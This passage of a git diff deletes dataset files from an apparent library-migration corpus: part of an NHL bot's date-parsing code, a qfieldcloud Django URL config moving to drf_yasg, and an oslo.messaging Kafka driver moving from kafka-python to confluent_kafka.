'MOUNTAIN': 'US/Mountain'} - if target in common: - target = common[target] - - return target - - def _ISODateToEasternTime(self, iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern time formatted with am/pm. (The default human-readable format - for the listing of games).""" - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) # Strip the seconds - - def _stripDateSeparators(self, date_string): - return date_string.replace('-', '') - - def _EnglishDateToDate(self, date): - """Convert a human-readable like 'yesterday' to a datetime object - and return a 'YYYYMMDD' string.""" - if date == "lastweek": - day_delta = -7 - elif date == "yesterday": - day_delta = -1 - elif date == "today" or date =="tonight": - day_delta = 0 - elif date == "tomorrow": - day_delta = 1 - elif date == "nextweek": - day_delta = 7 - elif date[:3] == 'sun': - date_string = pendulum.now('US/Pacific').next(pendulum.SUNDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'mon': - date_string = pendulum.now('US/Pacific').next(pendulum.MONDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'tue': - date_string = pendulum.now('US/Pacific').next(pendulum.TUESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'wed': - date_string = pendulum.now('US/Pacific').next(pendulum.WEDNESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'thu': - date_string = pendulum.now('US/Pacific').next(pendulum.THURSDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'fri': - date_string = pendulum.now('US/Pacific').next(pendulum.FRIDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'sat': - date_string = pendulum.now('US/Pacific').next(pendulum.SATURDAY).format('YYYY-MM-DD') - return date_string - # Calculate the day difference and return a string - date_string = self._pacificTimeNow().add(days=day_delta).strftime('%Y-%m-%d') - return date_string - - def _checkDateInput(self, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. Also, the API seems to go back until 2014-10-04, so we - will check that the input is not a date earlier than that.""" - - error_string = 'Incorrect date format, should be YYYY-MM-DD' - - if date is None: - return None - - if date in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date) - elif date[:3].lower() in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date.lower()) - - if date.isdigit(): - try: - date = pendulum.from_format(date, 'YYYYMMDD').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('-','').isdigit(): - try: - parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('/','').isdigit(): - if len(date.split('/')) == 2: - year = '/' + str(pendulum.datetime.now().year) - date += year - elif len(date.split('/')) == 3: - if len(date.split('/')[2]) == 2: - date = '{}/{}/{}'.format(date.split('/')[0], date.split('/')[1], '20{}'.format(date.split('/')[2])) - else: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - try: - date = pendulum.from_format(date, 'MM/DD/YYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif '-' not in date and date.isdigit() == False and len(date) > 3: - if date.title() in ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']: - return "Incorrect date format, should be YYYY-MM-DD" - try: - date = date.title() - year = str(pendulum.datetime.now().year) - date += year - try: - date = pendulum.from_format(date, 'DDMMMYYYY').strftime('%Y-%m-%d') - except: - date = pendulum.from_format(date, 'MMMDDYYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - #return "Incorrect date format, should be YYYY-MM-DD" - else: - return None - - return date - -Class = NHL - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff b/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff deleted file mode 100644 index 9c5b6fe..0000000 --- a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff +++ /dev/null @@ -1,49 +0,0 @@ -diff --git a/web-app/qfieldcloud/urls.py b/web-app/qfieldcloud/urls.py - index 4d662bf43a1f7e066b0eca3d90c5ff11dd04c061..4377d67a99ed8b6680276cbf4585cbac18439b37 100644 - --- a/web-app/qfieldcloud/urls.py - +++ b/web-app/qfieldcloud/urls.py -@@ -14,14 +14,41 @@ Including another URLconf - 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) - """ - from django.contrib import admin --from django.urls import path, include --from rest_framework_swagger.views import get_swagger_view -+from django.urls import path, re_path, include -+ -+from rest_framework import permissions -+from drf_yasg.views import get_schema_view -+from drf_yasg import openapi -+ -+ -+schema_view = get_schema_view( -+ openapi.Info( -+ title="QFieldcloud REST API", -+ default_version='v1', -+ description="Test description", -+ terms_of_service="https://", -+ contact=openapi.Contact(email="info@opengis.ch"), -+ license=openapi.License(name="License"), -+ ), -+ public=True, -+ permission_classes=(permissions.AllowAny,), -+) - - urlpatterns = [ -+ -+ re_path(r'^swagger(?P\.json|\.yaml)$', -+ schema_view.without_ui(cache_timeout=0), -+ name='schema-json'), -+ path('swagger/', -+ schema_view.with_ui('swagger', cache_timeout=0), -+ name='schema-swagger-ui'), -+ path('docs/', -+ schema_view.with_ui('redoc', cache_timeout=0), -+ name='schema-redoc'), -+ - path('admin/', admin.site.urls), - path('api/v1/auth/registration/', include('rest_auth.registration.urls')), - path('api/v1/auth/', include('rest_auth.urls')), - path('api/v1/', include('qfieldcloud.apps.api.urls')), -- path('docs/', get_swagger_view(title='QFieldcloud REST API')), - path('auth/', include('rest_framework.urls')), - ] diff --git a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py b/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py deleted file mode 100644 index 504039a..0000000 --- a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py +++ /dev/null @@ -1,27 +0,0 @@ -"""qfieldcloud URL Configuration - -The `urlpatterns` list routes URLs to views. For more information please see: - https://docs.djangoproject.com/en/2.2/topics/http/urls/ -Examples: -Function views - 1. Add an import: from my_app import views - 2. Add a URL to urlpatterns: path('', views.home, name='home') -Class-based views - 1. Add an import: from other_app.views import Home - 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') -Including another URLconf - 1. Import the include() function: from django.urls import include, path - 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) -""" -from django.contrib import admin -from django.urls import path, include -from rest_framework_swagger.views import get_swagger_view - -urlpatterns = [ - path('admin/', admin.site.urls), - path('api/v1/auth/registration/', include('rest_auth.registration.urls')), - path('api/v1/auth/', include('rest_auth.urls')), - path('api/v1/', include('qfieldcloud.apps.api.urls')), - path('docs/', get_swagger_view(title='QFieldcloud REST API')), - path('auth/', include('rest_framework.urls')), -] diff --git a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py b/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py deleted file mode 100644 index 458512b..0000000 --- a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py +++ /dev/null @@ -1,54 +0,0 @@ -"""qfieldcloud URL Configuration - -The `urlpatterns` list routes URLs to views. For more information please see: - https://docs.djangoproject.com/en/2.2/topics/http/urls/ -Examples: -Function views - 1. Add an import: from my_app import views - 2. Add a URL to urlpatterns: path('', views.home, name='home') -Class-based views - 1. Add an import: from other_app.views import Home - 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') -Including another URLconf - 1. Import the include() function: from django.urls import include, path - 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) -""" -from django.contrib import admin -from django.urls import path, re_path, include - -from rest_framework import permissions -from drf_yasg.views import get_schema_view -from drf_yasg import openapi - - -schema_view = get_schema_view( - openapi.Info( - title="QFieldcloud REST API", - default_version='v1', - description="Test description", - terms_of_service="https://", - contact=openapi.Contact(email="info@opengis.ch"), - license=openapi.License(name="License"), - ), - public=True, - permission_classes=(permissions.AllowAny,), -) - -urlpatterns = [ - - re_path(r'^swagger(?P\.json|\.yaml)$', - schema_view.without_ui(cache_timeout=0), - name='schema-json'), - path('swagger/', - schema_view.with_ui('swagger', cache_timeout=0), - name='schema-swagger-ui'), - path('docs/', - schema_view.with_ui('redoc', cache_timeout=0), - name='schema-redoc'), - - path('admin/', admin.site.urls), - path('api/v1/auth/registration/', include('rest_auth.registration.urls')), - path('api/v1/auth/', include('rest_auth.urls')), - path('api/v1/', include('qfieldcloud.apps.api.urls')), - path('auth/', include('rest_framework.urls')), -] diff --git a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff b/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff deleted file mode 100644 index 26a1825..0000000 --- a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff +++ /dev/null @@ -1,400 +0,0 @@ -diff --git a/oslo_messaging/_drivers/impl_kafka.py b/oslo_messaging/_drivers/impl_kafka.py - index 252844879d9e34c81b1777a92ad4407fab4a6853..5a842ae15582e4eedfb1b2510eaf4a8997701f58 100644 - --- a/oslo_messaging/_drivers/impl_kafka.py - +++ b/oslo_messaging/_drivers/impl_kafka.py -@@ -12,54 +12,30 @@ - # License for the specific language governing permissions and limitations - # under the License. - --# Following code fixes 2 issues with kafka-python and --# The current release of eventlet (0.19.0) does not actually remove --# select.poll [1]. Because of kafka-python.selectors34 selects --# PollSelector instead of SelectSelector [2]. PollSelector relies on --# select.poll, which does not work when eventlet/greenlet is used. This --# bug in evenlet is fixed in the master branch [3], but there's no --# release of eventlet that includes this fix at this point. -- --import json -+import logging - import threading - --import kafka --from kafka.client_async import selectors --import kafka.errors --from oslo_log import log as logging -+import confluent_kafka -+from confluent_kafka import KafkaException -+from oslo_serialization import jsonutils - from oslo_utils import eventletutils --import tenacity -+from oslo_utils import importutils - - from oslo_messaging._drivers import base - from oslo_messaging._drivers import common as driver_common - from oslo_messaging._drivers.kafka_driver import kafka_options --from oslo_messaging._i18n import _LE --from oslo_messaging._i18n import _LW --from oslo_serialization import jsonutils -- --import logging as l --l.basicConfig(level=l.INFO) --l.getLogger("kafka").setLevel(l.WARN) --l.getLogger("stevedore").setLevel(l.WARN) - --if eventletutils.is_monkey_patched('select'): -- # monkeypatch the vendored SelectSelector._select like eventlet does -- # https://github.com/eventlet/eventlet/blob/master/eventlet/green/selectors.py#L32 -- from eventlet.green import select -- selectors.SelectSelector._select = staticmethod(select.select) -- -- # Force to use the select selectors -- KAFKA_SELECTOR = selectors.SelectSelector --else: -- KAFKA_SELECTOR = selectors.DefaultSelector -+if eventletutils.EVENTLET_AVAILABLE: -+ tpool = importutils.try_import('eventlet.tpool') - - LOG = logging.getLogger(__name__) - - - def unpack_message(msg): -+ """Unpack context and msg.""" - context = {} - message = None -- msg = json.loads(msg) -+ msg = jsonutils.loads(msg) - message = driver_common.deserialize_msg(msg) - context = message['_context'] - del message['_context'] -@@ -68,7 +44,6 @@ def unpack_message(msg): - - def pack_message(ctxt, msg): - """Pack context into msg.""" -- - if isinstance(ctxt, dict): - context_d = ctxt - else: -@@ -97,25 +72,28 @@ def target_to_topic(target, priority=None, vhost=None): - return concat(".", [target.topic, priority, vhost]) - - --def retry_on_retriable_kafka_error(exc): -- return (isinstance(exc, kafka.errors.KafkaError) and exc.retriable) -+class ConsumerTimeout(KafkaException): -+ pass - - --def with_reconnect(retries=None): -- def decorator(func): -- @tenacity.retry( -- retry=tenacity.retry_if_exception(retry_on_retriable_kafka_error), -- wait=tenacity.wait_fixed(1), -- stop=tenacity.stop_after_attempt(retries), -- reraise=True -- ) -- def wrapper(*args, **kwargs): -- return func(*args, **kwargs) -- return wrapper -- return decorator -+class AssignedPartition(object): -+ """This class is used by the ConsumerConnection to track the -+ assigned partitions. -+ """ -+ def __init__(self, topic, partition): -+ super(AssignedPartition, self).__init__() -+ self.topic = topic -+ self.partition = partition -+ self.skey = '%s %d' % (self.topic, self.partition) -+ -+ def to_dict(self): -+ return {'topic': self.topic, 'partition': self.partition} - - - class Connection(object): -+ """This is the base class for consumer and producer connections for -+ transport attributes. -+ """ - - def __init__(self, conf, url): - -@@ -141,7 +119,7 @@ class Connection(object): - self.password = host.password - else: - if self.username != host.username: -- LOG.warning(_LW("Different transport usernames detected")) -+ LOG.warning("Different transport usernames detected") - - if host.hostname: - self.hostaddrs.append("%s:%s" % (host.hostname, host.port)) -@@ -152,7 +130,8 @@ class Connection(object): - - - class ConsumerConnection(Connection): -- -+ """This is the class for kafka topic/assigned partition consumer -+ """ - def __init__(self, conf, url): - - super(ConsumerConnection, self).__init__(conf, url) -@@ -160,28 +139,59 @@ class ConsumerConnection(Connection): - self.consumer_timeout = self.driver_conf.kafka_consumer_timeout - self.max_fetch_bytes = self.driver_conf.kafka_max_fetch_bytes - self.group_id = self.driver_conf.consumer_group -- self.enable_auto_commit = self.driver_conf.enable_auto_commit -+ self.use_auto_commit = self.driver_conf.enable_auto_commit - self.max_poll_records = self.driver_conf.max_poll_records - self._consume_loop_stopped = False -+ self.assignment_dict = dict() -+ -+ def find_assignment(self, topic, partition): -+ """Find and return existing assignment based on topic and partition""" -+ skey = '%s %d' % (topic, partition) -+ return self.assignment_dict.get(skey) -+ -+ def on_assign(self, consumer, topic_partitions): -+ """Rebalance on_assign callback""" -+ assignment = [AssignedPartition(p.topic, p.partition) -+ for p in topic_partitions] -+ self.assignment_dict = {a.skey: a for a in assignment} -+ for t in topic_partitions: -+ LOG.debug("Topic %s assigned to partition %d", -+ t.topic, t.partition) -+ -+ def on_revoke(self, consumer, topic_partitions): -+ """Rebalance on_revoke callback""" -+ self.assignment_dict = dict() -+ for t in topic_partitions: -+ LOG.debug("Topic %s revoked from partition %d", -+ t.topic, t.partition) - -- @with_reconnect() - def _poll_messages(self, timeout): -- messages = self.consumer.poll(timeout * 1000.0) -- messages = [record.value -- for records in messages.values() if records -- for record in records] -- if not messages: -- # NOTE(sileht): really ? you return payload but no messages... -- # simulate timeout to consume message again -- raise kafka.errors.ConsumerNoMoreData() -- -- if not self.enable_auto_commit: -- self.consumer.commit() -+ """Consume messages, callbacks and return list of messages""" -+ msglist = self.consumer.consume(self.max_poll_records, -+ timeout) -+ -+ if ((len(self.assignment_dict) == 0) or (len(msglist) == 0)): -+ raise ConsumerTimeout() -+ -+ messages = [] -+ for message in msglist: -+ if message is None: -+ break -+ a = self.find_assignment(message.topic(), message.partition()) -+ if a is None: -+ LOG.warning(("Message for %s received on unassigned " -+ "partition %d"), -+ message.topic(), message.partition()) -+ else: -+ messages.append(message.value()) -+ -+ if not self.use_auto_commit: -+ self.consumer.commit(asynchronous=False) - - return messages - - def consume(self, timeout=None): -- """Receive up to 'max_fetch_messages' messages. -+ """Receive messages. - - :param timeout: poll timeout in seconds - """ -@@ -199,12 +209,14 @@ class ConsumerConnection(Connection): - if self._consume_loop_stopped: - return - try: -+ if eventletutils.is_monkey_patched('thread'): -+ return tpool.execute(self._poll_messages, poll_timeout) - return self._poll_messages(poll_timeout) -- except kafka.errors.ConsumerNoMoreData as exc: -+ except ConsumerTimeout as exc: - poll_timeout = timer.check_return( - _raise_timeout, exc, maximum=self.consumer_timeout) - except Exception: -- LOG.exception(_LE("Failed to consume messages")) -+ LOG.exception("Failed to consume messages") - return - - def stop_consuming(self): -@@ -215,21 +227,25 @@ class ConsumerConnection(Connection): - self.consumer.close() - self.consumer = None - -- @with_reconnect() - def declare_topic_consumer(self, topics, group=None): -- self.consumer = kafka.KafkaConsumer( -- *topics, group_id=(group or self.group_id), -- enable_auto_commit=self.enable_auto_commit, -- bootstrap_servers=self.hostaddrs, -- max_partition_fetch_bytes=self.max_fetch_bytes, -- max_poll_records=self.max_poll_records, -- security_protocol=self.security_protocol, -- sasl_mechanism=self.sasl_mechanism, -- sasl_plain_username=self.username, -- sasl_plain_password=self.password, -- ssl_cafile=self.ssl_cafile, -- selector=KAFKA_SELECTOR -- ) -+ conf = { -+ 'bootstrap.servers': ",".join(self.hostaddrs), -+ 'group.id': (group or self.group_id), -+ 'enable.auto.commit': self.use_auto_commit, -+ 'max.partition.fetch.bytes': self.max_fetch_bytes, -+ 'security.protocol': self.security_protocol, -+ 'sasl.mechanism': self.sasl_mechanism, -+ 'sasl.username': self.username, -+ 'sasl.password': self.password, -+ 'ssl.ca.location': self.ssl_cafile, -+ 'enable.partition.eof': False, -+ 'default.topic.config': {'auto.offset.reset': 'latest'} -+ } -+ LOG.debug("Subscribing to %s as %s", topics, (group or self.group_id)) -+ self.consumer = confluent_kafka.Consumer(conf) -+ self.consumer.subscribe(topics, -+ on_assign=self.on_assign, -+ on_revoke=self.on_revoke) - - - class ProducerConnection(Connection): -@@ -242,6 +258,20 @@ class ProducerConnection(Connection): - self.producer = None - self.producer_lock = threading.Lock() - -+ def _produce_message(self, topic, message): -+ while True: -+ try: -+ self.producer.produce(topic, message) -+ except KafkaException as e: -+ LOG.error("Produce message failed: %s" % str(e)) -+ except BufferError: -+ LOG.debug("Produce message queue full, waiting for deliveries") -+ self.producer.poll(0.5) -+ continue -+ break -+ -+ self.producer.poll(0) -+ - def notify_send(self, topic, ctxt, msg, retry): - """Send messages to Kafka broker. - -@@ -254,16 +284,11 @@ class ProducerConnection(Connection): - message = pack_message(ctxt, msg) - message = jsonutils.dumps(message).encode('utf-8') - -- @with_reconnect(retries=retry) -- def wrapped_with_reconnect(): -- self._ensure_producer() -- # NOTE(sileht): This returns a future, we can use get() -- # if we want to block like other driver -- future = self.producer.send(topic, message) -- future.get() -- - try: -- wrapped_with_reconnect() -+ self._ensure_producer() -+ if eventletutils.is_monkey_patched('thread'): -+ return tpool.execute(self._produce_message, topic, message) -+ return self._produce_message(topic, message) - except Exception: - # NOTE(sileht): if something goes wrong close the producer - # connection -@@ -276,7 +301,10 @@ class ProducerConnection(Connection): - def _close_producer(self): - with self.producer_lock: - if self.producer: -- self.producer.close() -+ try: -+ self.producer.flush() -+ except KafkaException: -+ LOG.error("Flush error during producer close") - self.producer = None - - def _ensure_producer(self): -@@ -285,16 +313,17 @@ class ProducerConnection(Connection): - with self.producer_lock: - if self.producer: - return -- self.producer = kafka.KafkaProducer( -- bootstrap_servers=self.hostaddrs, -- linger_ms=self.linger_ms, -- batch_size=self.batch_size, -- security_protocol=self.security_protocol, -- sasl_mechanism=self.sasl_mechanism, -- sasl_plain_username=self.username, -- sasl_plain_password=self.password, -- ssl_cafile=self.ssl_cafile, -- selector=KAFKA_SELECTOR) -+ conf = { -+ 'bootstrap.servers': ",".join(self.hostaddrs), -+ 'linger.ms': self.linger_ms, -+ 'batch.num.messages': self.batch_size, -+ 'security.protocol': self.security_protocol, -+ 'sasl.mechanism': self.sasl_mechanism, -+ 'sasl.username': self.username, -+ 'sasl.password': self.password, -+ 'ssl.ca.location': self.ssl_cafile -+ } -+ self.producer = confluent_kafka.Producer(conf) - - - class OsloKafkaMessage(base.RpcIncomingMessage): -@@ -303,13 +332,13 @@ class OsloKafkaMessage(base.RpcIncomingMessage): - super(OsloKafkaMessage, self).__init__(ctxt, message) - - def requeue(self): -- LOG.warning(_LW("requeue is not supported")) -+ LOG.warning("requeue is not supported") - - def reply(self, reply=None, failure=None): -- LOG.warning(_LW("reply is not supported")) -+ LOG.warning("reply is not supported") - - def heartbeat(self): -- LOG.warning(_LW("heartbeat is not supported")) -+ LOG.warning("heartbeat is not supported") - - - class KafkaListener(base.PollStyleListener): -@@ -347,8 +376,9 @@ class KafkaListener(base.PollStyleListener): - - - class KafkaDriver(base.BaseDriver): -- """Note: Current implementation of this driver is experimental. -- We will have functional and/or integrated testing enabled for this driver. -+ """Kafka Driver -+ -+ Note: Current implementation of this driver is experimental. - """ - - def __init__(self, conf, url, default_exchange=None, -@@ -366,6 +396,7 @@ class KafkaDriver(base.BaseDriver): - for c in self.listeners: - c.close() - self.listeners = [] -+ LOG.info("Kafka messaging driver shutdown") - - def send(self, target, ctxt, message, wait_for_reply=None, timeout=None, - call_monitor_timeout=None, retry=None): -@@ -414,9 +445,9 @@ class KafkaDriver(base.BaseDriver): - :type pool: string - """ - conn = ConsumerConnection(self.conf, self._url) -- topics = set() -+ topics = [] - for target, priority in targets_and_priorities: -- topics.add(target_to_topic(target, priority)) -+ topics.append(target_to_topic(target, priority)) - - conn.declare_topic_consumer(topics, pool) - diff --git a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py b/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py deleted file mode 100644 index 20b97ca..0000000 --- a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py +++ /dev/null @@ -1,425 +0,0 @@ -# Copyright (C) 2015 Cisco Systems, Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); you may -# not use this file except in compliance with the License. You may obtain -# a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT -# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the -# License for the specific language governing permissions and limitations -# under the License. - -# Following code fixes 2 issues with kafka-python and -# The current release of eventlet (0.19.0) does not actually remove -# select.poll [1]. Because of kafka-python.selectors34 selects -# PollSelector instead of SelectSelector [2]. PollSelector relies on -# select.poll, which does not work when eventlet/greenlet is used. This -# bug in evenlet is fixed in the master branch [3], but there's no -# release of eventlet that includes this fix at this point. - -import json -import threading - -import kafka -from kafka.client_async import selectors -import kafka.errors -from oslo_log import log as logging -from oslo_utils import eventletutils -import tenacity - -from oslo_messaging._drivers import base -from oslo_messaging._drivers import common as driver_common -from oslo_messaging._drivers.kafka_driver import kafka_options -from oslo_messaging._i18n import _LE -from oslo_messaging._i18n import _LW -from oslo_serialization import jsonutils - -import logging as l -l.basicConfig(level=l.INFO) -l.getLogger("kafka").setLevel(l.WARN) -l.getLogger("stevedore").setLevel(l.WARN) - -if eventletutils.is_monkey_patched('select'): - # monkeypatch the vendored SelectSelector._select like eventlet does - # https://github.com/eventlet/eventlet/blob/master/eventlet/green/selectors.py#L32 - from eventlet.green import select - selectors.SelectSelector._select = staticmethod(select.select) - - # Force to use the select selectors - KAFKA_SELECTOR = selectors.SelectSelector -else: - KAFKA_SELECTOR = selectors.DefaultSelector - -LOG = logging.getLogger(__name__) - - -def unpack_message(msg): - context = {} - message = None - msg = json.loads(msg) - message = driver_common.deserialize_msg(msg) - context = message['_context'] - del message['_context'] - return context, message - - -def pack_message(ctxt, msg): - """Pack context into msg.""" - - if isinstance(ctxt, dict): - context_d = ctxt - else: - context_d = ctxt.to_dict() - msg['_context'] = context_d - - msg = driver_common.serialize_msg(msg) - - return msg - - -def concat(sep, items): - return sep.join(filter(bool, items)) - - -def target_to_topic(target, priority=None, vhost=None): - """Convert target into topic string - - :param target: Message destination target - :type target: oslo_messaging.Target - :param priority: Notification priority - :type priority: string - :param priority: Notification vhost - :type priority: string - """ - return concat(".", [target.topic, priority, vhost]) - - -def retry_on_retriable_kafka_error(exc): - return (isinstance(exc, kafka.errors.KafkaError) and exc.retriable) - - -def with_reconnect(retries=None): - def decorator(func): - @tenacity.retry( - retry=tenacity.retry_if_exception(retry_on_retriable_kafka_error), - wait=tenacity.wait_fixed(1), - stop=tenacity.stop_after_attempt(retries), - reraise=True - ) - def wrapper(*args, **kwargs): - return func(*args, **kwargs) - return wrapper - return decorator - - -class Connection(object): - - def __init__(self, conf, url): - - self.driver_conf = conf.oslo_messaging_kafka - self.security_protocol = self.driver_conf.security_protocol - self.sasl_mechanism = self.driver_conf.sasl_mechanism - self.ssl_cafile = self.driver_conf.ssl_cafile - self.url = url - self.virtual_host = url.virtual_host - self._parse_url() - - def _parse_url(self): - self.hostaddrs = [] - self.username = None - self.password = None - - for host in self.url.hosts: - # NOTE(ansmith): connections and failover are transparently - # managed by the client library. Credentials will be - # selectd from first host encountered in transport_url - if self.username is None: - self.username = host.username - self.password = host.password - else: - if self.username != host.username: - LOG.warning(_LW("Different transport usernames detected")) - - if host.hostname: - self.hostaddrs.append("%s:%s" % (host.hostname, host.port)) - - def reset(self): - """Reset a connection so it can be used again.""" - pass - - -class ConsumerConnection(Connection): - - def __init__(self, conf, url): - - super(ConsumerConnection, self).__init__(conf, url) - self.consumer = None - self.consumer_timeout = self.driver_conf.kafka_consumer_timeout - self.max_fetch_bytes = self.driver_conf.kafka_max_fetch_bytes - self.group_id = self.driver_conf.consumer_group - self.enable_auto_commit = self.driver_conf.enable_auto_commit - self.max_poll_records = self.driver_conf.max_poll_records - self._consume_loop_stopped = False - - @with_reconnect() - def _poll_messages(self, timeout): - messages = self.consumer.poll(timeout * 1000.0) - messages = [record.value - for records in messages.values() if records - for record in records] - if not messages: - # NOTE(sileht): really ? you return payload but no messages... - # simulate timeout to consume message again - raise kafka.errors.ConsumerNoMoreData() - - if not self.enable_auto_commit: - self.consumer.commit() - - return messages - - def consume(self, timeout=None): - """Receive up to 'max_fetch_messages' messages. - - :param timeout: poll timeout in seconds - """ - - def _raise_timeout(exc): - raise driver_common.Timeout(str(exc)) - - timer = driver_common.DecayingTimer(duration=timeout) - timer.start() - - poll_timeout = (self.consumer_timeout if timeout is None - else min(timeout, self.consumer_timeout)) - - while True: - if self._consume_loop_stopped: - return - try: - return self._poll_messages(poll_timeout) - except kafka.errors.ConsumerNoMoreData as exc: - poll_timeout = timer.check_return( - _raise_timeout, exc, maximum=self.consumer_timeout) - except Exception: - LOG.exception(_LE("Failed to consume messages")) - return - - def stop_consuming(self): - self._consume_loop_stopped = True - - def close(self): - if self.consumer: - self.consumer.close() - self.consumer = None - - @with_reconnect() - def declare_topic_consumer(self, topics, group=None): - self.consumer = kafka.KafkaConsumer( - *topics, group_id=(group or self.group_id), - enable_auto_commit=self.enable_auto_commit, - bootstrap_servers=self.hostaddrs, - max_partition_fetch_bytes=self.max_fetch_bytes, - max_poll_records=self.max_poll_records, - security_protocol=self.security_protocol, - sasl_mechanism=self.sasl_mechanism, - sasl_plain_username=self.username, - sasl_plain_password=self.password, - ssl_cafile=self.ssl_cafile, - selector=KAFKA_SELECTOR - ) - - -class ProducerConnection(Connection): - - def __init__(self, conf, url): - - super(ProducerConnection, self).__init__(conf, url) - self.batch_size = self.driver_conf.producer_batch_size - self.linger_ms = self.driver_conf.producer_batch_timeout * 1000 - self.producer = None - self.producer_lock = threading.Lock() - - def notify_send(self, topic, ctxt, msg, retry): - """Send messages to Kafka broker. - - :param topic: String of the topic - :param ctxt: context for the messages - :param msg: messages for publishing - :param retry: the number of retry - """ - retry = retry if retry >= 0 else None - message = pack_message(ctxt, msg) - message = jsonutils.dumps(message).encode('utf-8') - - @with_reconnect(retries=retry) - def wrapped_with_reconnect(): - self._ensure_producer() - # NOTE(sileht): This returns a future, we can use get() - # if we want to block like other driver - future = self.producer.send(topic, message) - future.get() - - try: - wrapped_with_reconnect() - except Exception: - # NOTE(sileht): if something goes wrong close the producer - # connection - self._close_producer() - raise - - def close(self): - self._close_producer() - - def _close_producer(self): - with self.producer_lock: - if self.producer: - self.producer.close() - self.producer = None - - def _ensure_producer(self): - if self.producer: - return - with self.producer_lock: - if self.producer: - return - self.producer = kafka.KafkaProducer( - bootstrap_servers=self.hostaddrs, - linger_ms=self.linger_ms, - batch_size=self.batch_size, - security_protocol=self.security_protocol, - sasl_mechanism=self.sasl_mechanism, - sasl_plain_username=self.username, - sasl_plain_password=self.password, - ssl_cafile=self.ssl_cafile, - selector=KAFKA_SELECTOR) - - -class OsloKafkaMessage(base.RpcIncomingMessage): - - def __init__(self, ctxt, message): - super(OsloKafkaMessage, self).__init__(ctxt, message) - - def requeue(self): - LOG.warning(_LW("requeue is not supported")) - - def reply(self, reply=None, failure=None): - LOG.warning(_LW("reply is not supported")) - - def heartbeat(self): - LOG.warning(_LW("heartbeat is not supported")) - - -class KafkaListener(base.PollStyleListener): - - def __init__(self, conn): - super(KafkaListener, self).__init__() - self._stopped = threading.Event() - self.conn = conn - self.incoming_queue = [] - - # FIXME(sileht): We do a first poll to ensure we topics are created - # This is a workaround mainly for functional tests, in real life - # this is fine if topics are not created synchroneously - self.poll(5) - - @base.batch_poll_helper - def poll(self, timeout=None): - while not self._stopped.is_set(): - if self.incoming_queue: - return self.incoming_queue.pop(0) - try: - messages = self.conn.consume(timeout=timeout) or [] - for message in messages: - msg = OsloKafkaMessage(*unpack_message(message)) - self.incoming_queue.append(msg) - except driver_common.Timeout: - return None - - def stop(self): - self._stopped.set() - self.conn.stop_consuming() - - def cleanup(self): - self.conn.close() - - -class KafkaDriver(base.BaseDriver): - """Note: Current implementation of this driver is experimental. - We will have functional and/or integrated testing enabled for this driver. - """ - - def __init__(self, conf, url, default_exchange=None, - allowed_remote_exmods=None): - conf = kafka_options.register_opts(conf, url) - super(KafkaDriver, self).__init__( - conf, url, default_exchange, allowed_remote_exmods) - - self.listeners = [] - self.virtual_host = url.virtual_host - self.pconn = ProducerConnection(conf, url) - - def cleanup(self): - self.pconn.close() - for c in self.listeners: - c.close() - self.listeners = [] - - def send(self, target, ctxt, message, wait_for_reply=None, timeout=None, - call_monitor_timeout=None, retry=None): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def send_notification(self, target, ctxt, message, version, retry=None): - """Send notification to Kafka brokers - - :param target: Message destination target - :type target: oslo_messaging.Target - :param ctxt: Message context - :type ctxt: dict - :param message: Message payload to pass - :type message: dict - :param version: 